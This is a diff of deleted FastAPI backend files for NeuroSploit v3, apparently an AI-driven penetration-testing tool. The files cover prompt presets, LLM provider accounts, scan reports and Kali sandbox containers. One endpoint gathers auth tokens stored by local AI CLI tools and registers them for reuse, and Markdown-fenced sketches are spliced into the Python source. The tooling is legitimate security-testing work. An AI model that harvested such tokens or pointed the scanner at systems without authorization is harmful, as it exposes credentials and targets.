- Redirect URI manipulation
- Token leakage"""
}
]
@router.get("/presets", response_model=List[PromptPreset])
async def get_preset_prompts():
"""Get list of preset prompts"""
return [
PromptPreset(
id=p["id"],
name=p["name"],
description=p["description"],
category=p["category"],
# Approximation: counts lines in the prompt text, not distinct vulnerability types
vulnerability_count=len(p["content"].split("\n"))
)
for p in PRESET_PROMPTS
]
@router.get("/presets/{preset_id}")
async def get_preset_prompt(preset_id: str):
"""Get a specific preset prompt by ID"""
for preset in PRESET_PROMPTS:
if preset["id"] == preset_id:
return preset
raise HTTPException(status_code=404, detail="Preset not found")
@router.post("/parse", response_model=PromptParseResult)
async def parse_prompt(prompt_data: PromptParse):
"""Parse a prompt to extract vulnerability types and testing scope"""
parser = PromptParser()
result = await parser.parse(prompt_data.content)
return result
@router.get("", response_model=List[PromptResponse])
async def list_prompts(
category: Optional[str] = None,
db: AsyncSession = Depends(get_db)
):
"""List all custom prompts"""
query = select(Prompt).where(Prompt.is_preset.is_(False))
if category:
query = query.where(Prompt.category == category)
query = query.order_by(Prompt.created_at.desc())
result = await db.execute(query)
prompts = result.scalars().all()
return [PromptResponse(**p.to_dict()) for p in prompts]
@router.post("", response_model=PromptResponse)
async def create_prompt(prompt_data: PromptCreate, db: AsyncSession = Depends(get_db)):
"""Create a custom prompt"""
# Parse vulnerabilities from content
parser = PromptParser()
parsed = await parser.parse(prompt_data.content)
prompt = Prompt(
name=prompt_data.name,
description=prompt_data.description,
content=prompt_data.content,
category=prompt_data.category,
is_preset=False,
parsed_vulnerabilities=[v.dict() for v in parsed.vulnerabilities_to_test]
)
db.add(prompt)
await db.commit()
await db.refresh(prompt)
return PromptResponse(**prompt.to_dict())
@router.get("/{prompt_id}", response_model=PromptResponse)
async def get_prompt(prompt_id: str, db: AsyncSession = Depends(get_db)):
"""Get a prompt by ID"""
result = await db.execute(select(Prompt).where(Prompt.id == prompt_id))
prompt = result.scalar_one_or_none()
if not prompt:
raise HTTPException(status_code=404, detail="Prompt not found")
return PromptResponse(**prompt.to_dict())
@router.put("/{prompt_id}", response_model=PromptResponse)
async def update_prompt(
prompt_id: str,
prompt_data: PromptUpdate,
db: AsyncSession = Depends(get_db)
):
"""Update a prompt"""
result = await db.execute(select(Prompt).where(Prompt.id == prompt_id))
prompt = result.scalar_one_or_none()
if not prompt:
raise HTTPException(status_code=404, detail="Prompt not found")
if prompt.is_preset:
raise HTTPException(status_code=400, detail="Cannot modify preset prompts")
if prompt_data.name is not None:
prompt.name = prompt_data.name
if prompt_data.description is not None:
prompt.description = prompt_data.description
if prompt_data.content is not None:
prompt.content = prompt_data.content
# Re-parse vulnerabilities
parser = PromptParser()
parsed = await parser.parse(prompt_data.content)
prompt.parsed_vulnerabilities = [v.dict() for v in parsed.vulnerabilities_to_test]
if prompt_data.category is not None:
prompt.category = prompt_data.category
await db.commit()
await db.refresh(prompt)
return PromptResponse(**prompt.to_dict())
@router.delete("/{prompt_id}")
async def delete_prompt(prompt_id: str, db: AsyncSession = Depends(get_db)):
"""Delete a prompt"""
result = await db.execute(select(Prompt).where(Prompt.id == prompt_id))
prompt = result.scalar_one_or_none()
if not prompt:
raise HTTPException(status_code=404, detail="Prompt not found")
if prompt.is_preset:
raise HTTPException(status_code=400, detail="Cannot delete preset prompts")
await db.delete(prompt)
await db.commit()
return {"message": "Prompt deleted"}
@router.post("/upload")
async def upload_prompt(file: UploadFile = File(...)):
"""Upload a prompt file (.md or .txt)"""
if not file.filename:
raise HTTPException(status_code=400, detail="No file provided")
ext = ("." + file.filename.rsplit(".", 1)[-1].lower()) if "." in file.filename else ""
if ext not in {".md", ".txt"}:
raise HTTPException(status_code=400, detail="Invalid file type. Use .md or .txt")
content = await file.read()
try:
text = content.decode("utf-8")
except UnicodeDecodeError:
raise HTTPException(status_code=400, detail="Unable to decode file")
# Parse the prompt
parser = PromptParser()
parsed = await parser.parse(text)
return {
"filename": file.filename,
"content": text,
"parsed": parsed.dict()
}
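The extension check in `upload_prompt` builds the suffix by hand from the filename. A minimal sketch of the same allow-list check using `pathlib`; `is_allowed_prompt_file` and `ALLOWED_SUFFIXES` are hypothetical names, not part of the original module:

```python
from pathlib import PurePath

# Same allow-list as the upload endpoint: Markdown and plain text only.
ALLOWED_SUFFIXES = {".md", ".txt"}


def is_allowed_prompt_file(filename: str) -> bool:
    """Return True when the final suffix of `filename` is on the allow-list."""
    # PurePath does no filesystem access; .suffix is the last dot-suffix or "".
    return PurePath(filename).suffix.lower() in ALLOWED_SUFFIXES
```

One behavioral difference to be aware of: a dotfile named exactly `.md` has an empty `suffix` under `pathlib`, so this sketch rejects it, whereas the string-splitting version accepts it.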
-408
@@ -1,408 +0,0 @@
"""
NeuroSploit v3 - Providers API
REST endpoints for managing LLM providers and accounts.
"""
from fastapi import APIRouter, HTTPException
from pydantic import BaseModel
from typing import Optional
router = APIRouter()
class ConnectRequest(BaseModel):
label: str = "Manual API Key"
credential: str
credential_type: str = "api_key"
model_override: Optional[str] = None
@router.get("")
async def list_providers():
"""List all providers with their accounts and status."""
from backend.core.smart_router import get_registry
registry = get_registry()
if not registry:
return {"enabled": False, "providers": []}
providers = []
for p in registry.get_all_providers():
accounts = []
for a in p.accounts.values():
accounts.append({
"id": a.id,
"label": a.label,
"source": a.source,
"credential_type": a.credential_type,
"is_active": a.is_active,
"tokens_used": a.tokens_used,
"last_used": a.last_used,
"expires_at": a.expires_at,
"model_override": a.model_override,
})
providers.append({
"id": p.id,
"name": p.name,
"auth_type": p.auth_type,
"api_format": p.api_format,
"tier": p.tier,
"default_model": p.default_model,
"accounts": accounts,
"connected": any(
a.is_active and a.id in registry._credentials
for a in p.accounts.values()
),
"enabled": getattr(p, "enabled", True),
})
return {"enabled": True, "providers": providers}
@router.get("/status")
async def providers_status():
"""Get quota and usage summary."""
from backend.core.smart_router import get_router
router_instance = get_router()
if not router_instance:
return {"enabled": False}
return {"enabled": True, **router_instance.get_status()}
@router.post("/{provider_id}/detect")
async def detect_cli_token(provider_id: str):
"""Auto-detect CLI token for a specific provider."""
from backend.core.smart_router import get_registry, get_extractor
registry = get_registry()
extractor = get_extractor()
if not registry or not extractor:
raise HTTPException(400, "Smart Router not enabled")
token = extractor.detect(provider_id)
if not token:
return {"detected": False, "message": f"No CLI token found for {provider_id}"}
# Add to registry
acct_id = registry.add_account(
provider_id=provider_id,
label=token.label,
credential=token.token,
credential_type=token.credential_type,
source="cli_detect",
refresh_token=token.refresh_token,
expires_at=token.expires_at,
)
return {
"detected": True,
"account_id": acct_id,
"label": token.label,
"credential_type": token.credential_type,
"has_refresh_token": token.refresh_token is not None,
"expires_at": token.expires_at,
}
@router.post("/{provider_id}/connect")
async def connect_provider(provider_id: str, req: ConnectRequest):
"""Manually add an API key or credential."""
from backend.core.smart_router import get_registry
registry = get_registry()
if not registry:
raise HTTPException(400, "Smart Router not enabled")
acct_id = registry.add_account(
provider_id=provider_id,
label=req.label,
credential=req.credential,
credential_type=req.credential_type,
source="manual",
model_override=req.model_override,
)
if not acct_id:
raise HTTPException(404, f"Unknown provider: {provider_id}")
return {"success": True, "account_id": acct_id}
@router.delete("/{provider_id}/accounts/{account_id}")
async def remove_account(provider_id: str, account_id: str):
"""Remove an account from a provider."""
from backend.core.smart_router import get_registry
registry = get_registry()
if not registry:
raise HTTPException(400, "Smart Router not enabled")
success = registry.remove_account(provider_id, account_id)
if not success:
raise HTTPException(404, "Account not found")
return {"success": True}
@router.post("/test/{provider_id}/{account_id}")
async def test_connection(provider_id: str, account_id: str):
"""Test connectivity for a specific account."""
from backend.core.smart_router import get_router
router_instance = get_router()
if not router_instance:
raise HTTPException(400, "Smart Router not enabled")
success, message = await router_instance.test_account(provider_id, account_id)
return {"success": success, "message": message}
# Known models per provider for dropdown selection
PROVIDER_MODELS = {
"claude_code": [
"claude-opus-4-6-20250918",
"claude-sonnet-4-6-20250918",
"claude-sonnet-4-5-20250929",
"claude-haiku-4-5-20251001",
"claude-sonnet-4-20250514",
"claude-opus-4-20250514",
"claude-haiku-4-20250514",
],
"kiro": [
"claude-opus-4-6-20250918",
"claude-sonnet-4-6-20250918",
"claude-sonnet-4-5-20250929",
"claude-haiku-4-5-20251001",
"claude-sonnet-4-20250514",
"claude-opus-4-20250514",
"claude-haiku-4-20250514",
],
"anthropic": [
"claude-opus-4-6-20250918",
"claude-sonnet-4-6-20250918",
"claude-sonnet-4-5-20250929",
"claude-haiku-4-5-20251001",
"claude-sonnet-4-20250514",
"claude-opus-4-20250514",
"claude-haiku-4-20250514",
"claude-3-5-sonnet-20241022",
],
"codex_cli": [
"gpt-4o",
"gpt-4o-mini",
"o3-mini",
"o4-mini",
"gpt-4.1",
"gpt-4.1-mini",
"gpt-4.1-nano",
],
"openai": [
"gpt-4o",
"gpt-4o-mini",
"o3-mini",
"o4-mini",
"gpt-4.1",
"gpt-4.1-mini",
"gpt-4.1-nano",
],
"gemini_cli": [
"gemini-3.0-pro",
"gemini-2.5-pro",
"gemini-2.5-flash",
"gemini-2.0-flash",
"gemini-2.0-flash-lite",
],
"gemini": [
"gemini-3.0-pro",
"gemini-2.5-pro",
"gemini-2.5-flash",
"gemini-2.0-flash",
"gemini-2.0-flash-lite",
],
"cursor": [
"cursor-fast",
"cursor-small",
"gpt-4o",
"claude-sonnet-4-6-20250918",
"claude-sonnet-4-5-20250929",
],
"copilot": [
"gpt-4o",
"gpt-4o-mini",
"claude-sonnet-4-6-20250918",
"claude-sonnet-4-5-20250929",
],
"openrouter": [
"anthropic/claude-opus-4-6",
"anthropic/claude-sonnet-4-6",
"anthropic/claude-sonnet-4-5",
"anthropic/claude-haiku-4-5",
"anthropic/claude-sonnet-4",
"anthropic/claude-opus-4",
"openai/gpt-4o",
"google/gemini-3.0-pro",
"google/gemini-2.5-pro",
"google/gemini-2.5-flash",
"meta-llama/llama-4-maverick",
"deepseek/deepseek-r1",
],
"together": [
"meta-llama/Llama-3-70b-chat-hf",
"meta-llama/Llama-3.3-70B-Instruct-Turbo",
"deepseek-ai/DeepSeek-R1",
"Qwen/Qwen2.5-72B-Instruct-Turbo",
],
"fireworks": [
"accounts/fireworks/models/llama-v3p1-70b-instruct",
"accounts/fireworks/models/llama-v3p3-70b-instruct",
"accounts/fireworks/models/deepseek-r1",
],
"iflow": ["kimi-k2"],
"qwen_code": ["qwen3-coder", "qwen-max"],
"ollama": ["llama3", "llama3.2", "mistral", "codellama", "deepseek-r1"],
"lmstudio": ["local-model"],
}
@router.get("/available-models")
async def available_models():
"""Get list of available provider+model combinations for selection dropdowns."""
from backend.core.smart_router import get_registry
registry = get_registry()
if not registry:
return {"models": []}
models = []
for p in registry.get_all_providers():
active = registry.get_active_accounts(p.id)
if not active:
continue
models.append({
"provider_id": p.id,
"provider_name": p.name,
"default_model": p.default_model,
"tier": p.tier,
"available_models": PROVIDER_MODELS.get(p.id, [p.default_model]),
})
# Sort by tier (paid first) then name
models.sort(key=lambda m: (m["tier"], m["provider_name"]))
return {"models": models}
@router.post("/detect-all")
async def detect_all_tokens():
"""Scan all CLI tools for available tokens."""
from backend.core.smart_router import get_registry, get_extractor
registry = get_registry()
extractor = get_extractor()
if not registry or not extractor:
raise HTTPException(400, "Smart Router not enabled")
tokens = extractor.detect_all()
results = []
for token in tokens:
acct_id = registry.add_account(
provider_id=token.provider_id,
label=token.label,
credential=token.token,
credential_type=token.credential_type,
source="cli_detect",
refresh_token=token.refresh_token,
expires_at=token.expires_at,
)
results.append({
"provider_id": token.provider_id,
"label": token.label,
"account_id": acct_id,
})
return {
"detected_count": len(results),
"results": results,
}
class ToggleRequest(BaseModel):
enabled: bool
@router.post("/{provider_id}/toggle")
async def toggle_provider(provider_id: str, req: ToggleRequest):
"""Enable or disable a provider. Disabled providers are skipped by the router."""
from backend.core.smart_router import get_registry
registry = get_registry()
if not registry:
raise HTTPException(400, "Smart Router not enabled")
success = registry.toggle_provider(provider_id, req.enabled)
if not success:
raise HTTPException(404, f"Unknown provider: {provider_id}")
return {"success": True, "provider_id": provider_id, "enabled": req.enabled}
# Whitelist of env keys that can be modified via UI
ALLOWED_ENV_KEYS = {
"ANTHROPIC_API_KEY", "OPENAI_API_KEY", "GEMINI_API_KEY", "GOOGLE_API_KEY",
"NIM_API_KEY", "NIM_MODEL", "NIM_BASE_URL",
"OPENROUTER_API_KEY", "TOGETHER_API_KEY", "FIREWORKS_API_KEY",
"OLLAMA_HOST", "LMSTUDIO_HOST",
"ENABLE_SMART_ROUTER", "ENABLE_REASONING", "ENABLE_CVE_HUNT",
"ENABLE_MULTI_AGENT", "ENABLE_RESEARCHER_AI",
"NVD_API_KEY", "GITHUB_TOKEN", "TOKEN_BUDGET",
}
class EnvUpdateRequest(BaseModel):
key: str
value: str
@router.get("/env")
async def get_env_keys():
"""Get current values of allowed env keys (masked for secrets)."""
import os
result = {}
for key in sorted(ALLOWED_ENV_KEYS):
val = os.getenv(key, "")
# Mask secrets (API keys and tokens); feature flags and TOKEN_BUDGET are returned as-is
if val and key.endswith(("_KEY", "_TOKEN")):
# Mask API keys: show first 8 and last 4 chars
if len(val) > 16:
result[key] = val[:8] + "..." + val[-4:]
else:
result[key] = "****"
else:
result[key] = val
return {"env": result, "allowed_keys": sorted(ALLOWED_ENV_KEYS)}
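# A minimal sketch of the masking rule applied in get_env_keys above, pulled out as a
# standalone helper. The name mask_secret is hypothetical and is not part of this module.

```python
def mask_secret(value: str) -> str:
    """Mask a secret for display, keeping the first 8 and last 4 characters."""
    if not value:
        # Unset variables are reported as empty strings, not as "****".
        return ""
    if len(value) > 16:
        return value[:8] + "..." + value[-4:]
    # Short values would leak too much if partially shown, so hide them fully.
    return "****"
```

# Keeping the rule in one helper would make it easier to test and to reuse wherever
# secrets are echoed back to the UI.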
@router.post("/env")
async def update_env_key(req: EnvUpdateRequest):
"""Update an env var and persist to .env file."""
import os
from pathlib import Path
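if req.key not in ALLOWED_ENV_KEYS:
raise HTTPException(400, f"Key '{req.key}' is not in the allowed whitelist")
# Reject line breaks so a value cannot inject extra entries into the .env file
if "\n" in req.value or "\r" in req.value:
raise HTTPException(400, "Value must not contain line breaks")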
# Update in-process env
os.environ[req.key] = req.value
# Persist to .env file
env_path = Path(__file__).parent.parent.parent.parent / ".env"
try:
lines = []
found = False
if env_path.exists():
for line in env_path.read_text().splitlines():
stripped = line.strip()
if stripped.startswith(f"{req.key}=") or stripped.startswith(f"# {req.key}="):
lines.append(f"{req.key}={req.value}")
found = True
else:
lines.append(line)
if not found:
lines.append(f"{req.key}={req.value}")
env_path.write_text("\n".join(lines) + "\n")
except Exception as e:
# Still updated in-process even if file write failed
return {"success": True, "persisted": False, "error": str(e)}
return {"success": True, "persisted": True}
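# The .env rewrite in update_env_key can be sketched as a pure function over the file
# text, which is easier to test than code that touches the disk. upsert_env_line is a
# hypothetical name; the matching rule (an active or "# "-commented KEY= line) follows
# the loop above.

```python
def upsert_env_line(text: str, key: str, value: str) -> str:
    """Return .env text with KEY=value replaced in place, or appended if absent."""
    lines = []
    found = False
    for line in text.splitlines():
        stripped = line.strip()
        # Replace both an active entry and a commented-out "# KEY=" placeholder.
        if stripped.startswith(f"{key}=") or stripped.startswith(f"# {key}="):
            lines.append(f"{key}={value}")
            found = True
        else:
            lines.append(line)
    if not found:
        lines.append(f"{key}={value}")
    return "\n".join(lines) + "\n"
```

# The endpoint could then call env_path.write_text(upsert_env_line(old_text, key, value)).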
-387
@@ -1,387 +0,0 @@
"""
NeuroSploit v3 - Reports API Endpoints
"""
from typing import List, Optional
from fastapi import APIRouter, Depends, HTTPException
from fastapi.responses import FileResponse, HTMLResponse
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select
from pathlib import Path
from backend.db.database import get_db
from backend.models import Scan, Report, Vulnerability, Endpoint
from backend.schemas.report import ReportGenerate, ReportResponse, ReportListResponse
from backend.core.report_engine.generator import ReportGenerator
from backend.config import settings
router = APIRouter()
@router.get("", response_model=ReportListResponse)
async def list_reports(
scan_id: Optional[str] = None,
auto_generated: Optional[bool] = None,
is_partial: Optional[bool] = None,
db: AsyncSession = Depends(get_db)
):
"""List all reports with optional filtering"""
query = select(Report).order_by(Report.generated_at.desc())
if scan_id:
query = query.where(Report.scan_id == scan_id)
if auto_generated is not None:
query = query.where(Report.auto_generated == auto_generated)
if is_partial is not None:
query = query.where(Report.is_partial == is_partial)
result = await db.execute(query)
reports = result.scalars().all()
return ReportListResponse(
reports=[ReportResponse(**r.to_dict()) for r in reports],
total=len(reports)
)
@router.post("", response_model=ReportResponse)
async def generate_report(
report_data: ReportGenerate,
db: AsyncSession = Depends(get_db)
):
"""Generate a new report for a scan"""
# Get scan
scan_result = await db.execute(select(Scan).where(Scan.id == report_data.scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Get vulnerabilities
vulns_result = await db.execute(
select(Vulnerability).where(Vulnerability.scan_id == report_data.scan_id)
)
vulnerabilities = vulns_result.scalars().all()
# Try to get tool_executions from agent in-memory results
tool_executions = []
try:
from backend.api.v1.agent import scan_to_agent, agent_results
agent_id = scan_to_agent.get(report_data.scan_id)
if agent_id and agent_id in agent_results:
tool_executions = agent_results[agent_id].get("tool_executions", [])
if not tool_executions:
rpt = agent_results[agent_id].get("report", {})
tool_executions = rpt.get("tool_executions", []) if isinstance(rpt, dict) else []
except Exception:
pass
# Get endpoints
endpoints_result = await db.execute(
select(Endpoint).where(Endpoint.scan_id == report_data.scan_id)
)
endpoints = endpoints_result.scalars().all()
# Generate report
generator = ReportGenerator()
report_path, executive_summary = await generator.generate(
scan=scan,
vulnerabilities=vulnerabilities,
format=report_data.format,
title=report_data.title,
include_executive_summary=report_data.include_executive_summary,
include_poc=report_data.include_poc,
include_remediation=report_data.include_remediation,
tool_executions=tool_executions,
endpoints=endpoints,
)
# Save report record
report = Report(
scan_id=scan.id,
title=report_data.title or f"Report - {scan.name}",
format=report_data.format,
file_path=str(report_path),
executive_summary=executive_summary
)
db.add(report)
await db.commit()
await db.refresh(report)
return ReportResponse(**report.to_dict())
@router.post("/ai-generate", response_model=ReportResponse)
async def generate_ai_report(
report_data: ReportGenerate,
db: AsyncSession = Depends(get_db)
):
"""Generate an AI-enhanced report with LLM-written executive summary and per-finding analysis."""
# Get scan
scan_result = await db.execute(select(Scan).where(Scan.id == report_data.scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Get vulnerabilities
vulns_result = await db.execute(
select(Vulnerability).where(Vulnerability.scan_id == report_data.scan_id)
)
vulnerabilities = vulns_result.scalars().all()
# Try to get tool_executions from agent in-memory results
tool_executions = []
try:
from backend.api.v1.agent import scan_to_agent, agent_results
agent_id = scan_to_agent.get(report_data.scan_id)
if agent_id and agent_id in agent_results:
tool_executions = agent_results[agent_id].get("tool_executions", [])
# Also check nested report
if not tool_executions:
rpt = agent_results[agent_id].get("report", {})
tool_executions = rpt.get("tool_executions", []) if isinstance(rpt, dict) else []
except Exception:
pass
# Generate AI report
generator = ReportGenerator()
try:
report_path, ai_summary = await generator.generate_ai_report(
scan=scan,
vulnerabilities=vulnerabilities,
tool_executions=tool_executions,
title=report_data.title,
preferred_provider=report_data.preferred_provider,
preferred_model=report_data.preferred_model,
)
except Exception as e:
import logging
logging.getLogger(__name__).error(f"AI report generation failed: {e}")
raise HTTPException(status_code=500, detail=f"AI report generation failed: {str(e)}")
# Save report record
report = Report(
scan_id=scan.id,
title=report_data.title or f"AI Report - {scan.name}",
format="html",
file_path=str(report_path),
executive_summary=ai_summary[:2000] if ai_summary else None
)
db.add(report)
await db.commit()
await db.refresh(report)
return ReportResponse(**report.to_dict())
@router.get("/{report_id}", response_model=ReportResponse)
async def get_report(report_id: str, db: AsyncSession = Depends(get_db)):
"""Get report details"""
result = await db.execute(select(Report).where(Report.id == report_id))
report = result.scalar_one_or_none()
if not report:
raise HTTPException(status_code=404, detail="Report not found")
return ReportResponse(**report.to_dict())
@router.get("/{report_id}/view")
async def view_report(report_id: str, db: AsyncSession = Depends(get_db)):
"""View report in browser (HTML)"""
result = await db.execute(select(Report).where(Report.id == report_id))
report = result.scalar_one_or_none()
if not report:
raise HTTPException(status_code=404, detail="Report not found")
if not report.file_path:
raise HTTPException(status_code=404, detail="Report file not found")
file_path = Path(report.file_path)
if not file_path.exists():
raise HTTPException(status_code=404, detail="Report file not found on disk")
if report.format == "html":
content = file_path.read_text()
return HTMLResponse(content=content)
else:
return FileResponse(
path=str(file_path),
media_type="application/octet-stream",
filename=file_path.name
)
@router.get("/{report_id}/download/{format}")
async def download_report(
report_id: str,
format: str,
db: AsyncSession = Depends(get_db)
):
"""Download report in specified format"""
result = await db.execute(select(Report).where(Report.id == report_id))
report = result.scalar_one_or_none()
if not report:
raise HTTPException(status_code=404, detail="Report not found")
# Get scan and vulnerabilities for generating report
scan_result = await db.execute(select(Scan).where(Scan.id == report.scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found for report")
vulns_result = await db.execute(
select(Vulnerability).where(Vulnerability.scan_id == report.scan_id)
)
vulnerabilities = vulns_result.scalars().all()
# Always generate fresh report file (handles auto-generated reports without file_path)
generator = ReportGenerator()
report_path, _ = await generator.generate(
scan=scan,
vulnerabilities=vulnerabilities,
format=format,
title=report.title
)
file_path = Path(report_path)
# Update report with file path if not set
if not report.file_path:
report.file_path = str(file_path)
report.format = format
await db.commit()
if not file_path.exists():
raise HTTPException(status_code=404, detail="Report file not found")
media_types = {
"html": "text/html",
"pdf": "application/pdf",
"json": "application/json"
}
return FileResponse(
path=str(file_path),
media_type=media_types.get(format, "application/octet-stream"),
filename=file_path.name
)
@router.get("/{report_id}/download-zip")
async def download_report_zip(
report_id: str,
db: AsyncSession = Depends(get_db)
):
"""Download report as ZIP with screenshots included"""
import zipfile
import tempfile
import hashlib
result = await db.execute(select(Report).where(Report.id == report_id))
report = result.scalar_one_or_none()
if not report:
raise HTTPException(status_code=404, detail="Report not found")
scan_result = await db.execute(select(Scan).where(Scan.id == report.scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found for report")
vulns_result = await db.execute(
select(Vulnerability).where(Vulnerability.scan_id == report.scan_id)
)
vulnerabilities = vulns_result.scalars().all()
# Generate HTML report
generator = ReportGenerator()
report_path, _ = await generator.generate(
scan=scan,
vulnerabilities=vulnerabilities,
format="html",
title=report.title
)
# Collect screenshots (use absolute path via settings.BASE_DIR)
# Check scan-scoped path first, then legacy flat path
screenshots_base = settings.BASE_DIR / "reports" / "screenshots"
scan_id_str = str(scan.id) if scan else None
screenshot_files = []
for vuln in vulnerabilities:
# Finding ID is md5(vuln_type+url+param)[:8]
vuln_url = getattr(vuln, 'url', None) or vuln.affected_endpoint or ''
vuln_param = getattr(vuln, 'parameter', None) or getattr(vuln, 'poc_parameter', None) or ''
finding_id = hashlib.md5(
f"{vuln.vulnerability_type}{vuln_url}{vuln_param}".encode()
).hexdigest()[:8]
# Scan-scoped path: reports/screenshots/{scan_id}/{finding_id}/
finding_dir = None
if scan_id_str:
scan_dir = screenshots_base / scan_id_str / finding_id
if scan_dir.exists():
finding_dir = scan_dir
if not finding_dir:
legacy_dir = screenshots_base / finding_id
if legacy_dir.exists():
finding_dir = legacy_dir
if finding_dir:
for img in finding_dir.glob("*.png"):
screenshot_files.append((img, f"screenshots/{finding_id}/{img.name}"))
# Also include base64 screenshots from DB as files in the ZIP
db_screenshots = getattr(vuln, 'screenshots', None) or []
for idx, ss in enumerate(db_screenshots):
if isinstance(ss, str) and ss.startswith("data:image/"):
# Will be embedded in HTML, but also save as file
import base64 as b64
try:
b64_data = ss.split(",", 1)[1]
img_bytes = b64.b64decode(b64_data)
img_name = f"screenshots/{finding_id}/evidence_{idx+1}.png"
# Write to temp for ZIP inclusion
tmp_img = Path(tempfile.gettempdir()) / f"ss_{finding_id}_{idx}.png"
tmp_img.write_bytes(img_bytes)
screenshot_files.append((tmp_img, img_name))
except Exception:
pass
# Create ZIP
zip_name = Path(report_path).stem + ".zip"
zip_path = Path(tempfile.gettempdir()) / zip_name
with zipfile.ZipFile(str(zip_path), 'w', zipfile.ZIP_DEFLATED) as zf:
zf.write(report_path, "report.html")
for src_path, arc_name in screenshot_files:
zf.write(str(src_path), arc_name)
return FileResponse(
path=str(zip_path),
media_type="application/zip",
filename=zip_name
)
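# A minimal sketch of the two helpers that download_report_zip relies on implicitly:
# deriving the 8-character finding ID and decoding a base64 data URI into image bytes.
# The function names are hypothetical; the hashing scheme mirrors the comment above
# (md5 of vuln_type + url + param, truncated to 8 hex characters).

```python
import base64
import hashlib


def finding_id(vuln_type: str, url: str, param: str = "") -> str:
    """Derive the short, deterministic directory name used for a finding."""
    return hashlib.md5(f"{vuln_type}{url}{param}".encode()).hexdigest()[:8]


def decode_data_uri(data_uri: str) -> bytes:
    """Decode a 'data:image/...;base64,<payload>' string into raw bytes."""
    header, _, payload = data_uri.partition(",")
    if not header.startswith("data:image/") or not payload:
        raise ValueError("not an image data URI")
    return base64.b64decode(payload)
```

# md5 is used here only as a stable short identifier, not for any security purpose.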
@router.delete("/{report_id}")
async def delete_report(report_id: str, db: AsyncSession = Depends(get_db)):
"""Delete a report"""
result = await db.execute(select(Report).where(Report.id == report_id))
report = result.scalar_one_or_none()
if not report:
raise HTTPException(status_code=404, detail="Report not found")
# Delete file if exists
if report.file_path:
file_path = Path(report.file_path)
if file_path.exists():
file_path.unlink()
await db.delete(report)
await db.commit()
return {"message": "Report deleted"}
-130
@@ -1,130 +0,0 @@
"""
NeuroSploit v3 - Sandbox Container Management API
Real-time monitoring and management of per-scan Kali Linux containers.
"""
from datetime import datetime
from fastapi import APIRouter, HTTPException
router = APIRouter()
def _docker_available() -> bool:
try:
import docker
docker.from_env().ping()
return True
except Exception:
return False
@router.get("/")
async def list_sandboxes():
"""List all sandbox containers with pool status."""
try:
from core.container_pool import get_pool
pool = get_pool()
except Exception as e:
return {
"pool": {
"active": 0,
"max_concurrent": 0,
"image": "neurosploit-kali:latest",
"container_ttl_minutes": 60,
"docker_available": _docker_available(),
},
"containers": [],
"error": str(e),
}
sandboxes = pool.list_sandboxes()
now = datetime.utcnow()
containers = []
for info in sandboxes.values():
created = info.get("created_at")
uptime = 0.0
if created:
try:
dt = datetime.fromisoformat(created)
uptime = (now - dt).total_seconds()
except Exception:
pass
containers.append({
**info,
"uptime_seconds": uptime,
})
return {
"pool": {
"active": pool.active_count,
"max_concurrent": pool.max_concurrent,
"image": pool.image,
"container_ttl_minutes": int(pool.container_ttl.total_seconds() / 60),
"docker_available": _docker_available(),
},
"containers": containers,
}
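# The per-container uptime calculation in list_sandboxes can be sketched on its own.
# uptime_seconds is a hypothetical helper; it assumes created_at is a naive ISO-8601
# string in the same (UTC) frame as the "now" value passed in.

```python
from datetime import datetime
from typing import Optional


def uptime_seconds(created_at: Optional[str], now: datetime) -> float:
    """Return seconds elapsed since created_at, or 0.0 if it is missing or invalid."""
    if not created_at:
        return 0.0
    try:
        started = datetime.fromisoformat(created_at)
        return (now - started).total_seconds()
    except (ValueError, TypeError):
        # Malformed timestamps, or mixing naive and aware datetimes, fall back to 0.
        return 0.0
```

# Passing "now" in explicitly keeps the helper deterministic under test.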
@router.get("/{scan_id}")
async def get_sandbox(scan_id: str):
"""Get health check for a specific sandbox container."""
try:
from core.container_pool import get_pool
pool = get_pool()
except Exception as e:
raise HTTPException(status_code=503, detail=str(e))
sandboxes = pool.list_sandboxes()
if scan_id not in sandboxes:
raise HTTPException(status_code=404, detail=f"No sandbox for scan {scan_id}")
sb = pool._sandboxes.get(scan_id)
if not sb:
raise HTTPException(status_code=404, detail="Sandbox instance not found")
health = await sb.health_check()
return health
@router.delete("/{scan_id}")
async def destroy_sandbox(scan_id: str):
"""Destroy a specific sandbox container."""
try:
from core.container_pool import get_pool
pool = get_pool()
except Exception as e:
raise HTTPException(status_code=503, detail=str(e))
sandboxes = pool.list_sandboxes()
if scan_id not in sandboxes:
raise HTTPException(status_code=404, detail=f"No sandbox for scan {scan_id}")
await pool.destroy(scan_id)
return {"message": f"Sandbox for scan {scan_id} destroyed", "scan_id": scan_id}
@router.post("/cleanup")
async def cleanup_expired():
"""Remove containers that have exceeded their TTL."""
try:
from core.container_pool import get_pool
pool = get_pool()
await pool.cleanup_expired()
return {"message": "Expired containers cleaned up"}
except Exception as e:
raise HTTPException(status_code=503, detail=str(e))
@router.post("/cleanup-orphans")
async def cleanup_orphans():
"""Remove orphan containers not tracked by the pool."""
try:
from core.container_pool import get_pool
pool = get_pool()
await pool.cleanup_orphans()
return {"message": "Orphan containers cleaned up"}
except Exception as e:
raise HTTPException(status_code=503, detail=str(e))
-656
@@ -1,656 +0,0 @@
"""
NeuroSploit v3 - Scans API Endpoints
"""
from typing import List, Optional
from datetime import datetime
from fastapi import APIRouter, Depends, HTTPException, BackgroundTasks
from pydantic import BaseModel
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, func
from urllib.parse import urlparse
from backend.db.database import get_db
from backend.models import Scan, Target, Endpoint, Vulnerability
from backend.schemas.scan import ScanCreate, ScanUpdate, ScanResponse, ScanListResponse, ScanProgress
from backend.services.scan_service import run_scan_task, skip_to_phase as _skip_to_phase, PHASE_ORDER
router = APIRouter()
@router.get("", response_model=ScanListResponse)
async def list_scans(
page: int = 1,
per_page: int = 10,
status: Optional[str] = None,
db: AsyncSession = Depends(get_db)
):
"""List all scans with pagination"""
query = select(Scan).order_by(Scan.created_at.desc())
if status:
query = query.where(Scan.status == status)
# Get total count
count_query = select(func.count()).select_from(Scan)
if status:
count_query = count_query.where(Scan.status == status)
total_result = await db.execute(count_query)
total = total_result.scalar()
